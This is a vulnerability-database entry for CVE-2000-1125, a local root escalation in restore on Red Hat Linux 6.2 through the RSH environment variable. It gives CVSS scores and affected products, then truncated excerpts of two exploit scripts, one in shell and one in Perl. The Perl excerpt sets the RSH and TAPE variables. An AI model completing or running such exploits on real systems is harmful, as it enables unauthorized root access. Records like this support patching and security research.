7.2
CVSSv2

CVE-2000-1125

Published: 09/01/2001 Updated: 18/10/2016
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 735
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

restore 0.4b15 and previous versions in Red Hat Linux 6.2 trusts the pathname specified by the RSH environmental variable, which allows local users to obtain root privileges by modifying the RSH variable to point to a Trojan horse program.

Vulnerable Product Search on Vulmon Subscribe to Product

redhat linux 6.2e

redhat linux 6.2

Exploits

#!/bin/sh # # /sbin/restore exploit for rh62 # # I did not find this weakness my self, all i did was # writing this script (and some more) to make it # automatic and easy to use # # This exploit should work on all redhat 62 systems # with /sbin/restore not "fucked up" May work on other # distros too, but only tested successfully on rh62 # # ...
source: wwwsecurityfocuscom/bid/1914/info restore is a program for backup and recovery procedures, distributed with the RedHat Linux Operating System A vulnerability exists that could allow a user elevated permissions The problem occurs in the RSH environment variable restore is dependent upon this environment variable for execution ...
#!/usr/bin/perl # perl exploit of restore and dump # redhat linux 62 # written by tlabs # Use at your discretion $EXPORT1="TAPE=garbage:garbage" ; $EXPORT2="RSH=/hey" ; sub USAGE { print "$0 <type>\n1=dump 2=dumpstatic 3=restore 4=restorestaic\nYour choice innit;)\nWritten by Tlabs\n" ; exit 0 ; } sub ERROR { print "$_[0]\n" ; ...